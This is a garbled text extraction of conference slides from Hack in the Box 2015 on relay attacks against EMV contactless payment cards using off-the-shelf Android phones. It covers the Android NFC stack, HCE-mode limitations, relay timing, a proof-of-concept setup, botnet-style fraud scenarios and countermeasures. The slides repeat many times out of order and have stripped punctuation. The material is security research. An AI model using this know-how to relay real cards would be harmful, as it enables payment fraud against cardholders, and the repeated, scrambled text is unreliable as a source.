J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
